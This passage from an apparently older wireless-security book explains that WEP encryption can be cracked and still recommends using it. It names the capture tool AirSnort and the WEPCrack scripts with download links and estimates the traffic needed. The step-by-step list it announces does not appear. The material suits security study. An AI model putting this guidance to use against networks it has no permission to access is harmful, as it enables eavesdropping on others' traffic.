Wired Equivalent Privacy (WEP), as discussed in Chapter 4, "WEP Security" and Chapter 5, "Cracking WEP," is fundamentally flawed, allowing you to crack it. However, even though it is possible to crack WEP encryption, we still highly recommend that you use it on all your wireless networks. This will thwart the casual drive-by hacker. It also enables another layer of legal protection that prohibits the cracking of transmitted, encrypted signals. With that in mind, let's look at the practical process of cracking WEP.
The most important tool that you are going to need to crack a WEP-encrypted signal is time. The longer you capture data, the more likely you are to receive a frame that will leak a key byte. There is only about a 5% chance, in some cases a 13% chance, of this happening. On average, you will need to receive about 5,000,000 frames to crack a WEP-encrypted signal. To actually capture the encrypted data, you will need a wireless sniffer such as AirSnort (available at http://airsnort.shmoo.com/). In addition to the wireless sniffer, you will also need a series of Perl scripts, which are written by one of the technical reviewers for this book, and which are called (appropriately) WEPCrack. These scripts are available online at http:// sourceforge .net/projects/ wepcrack /.
After you have acquired the necessary tools, please refer to the following list for a step-by-step guide to cracking a WEP-encrypted signal.
For additional information about WEP theory, please refer to Chapters 4 and 5.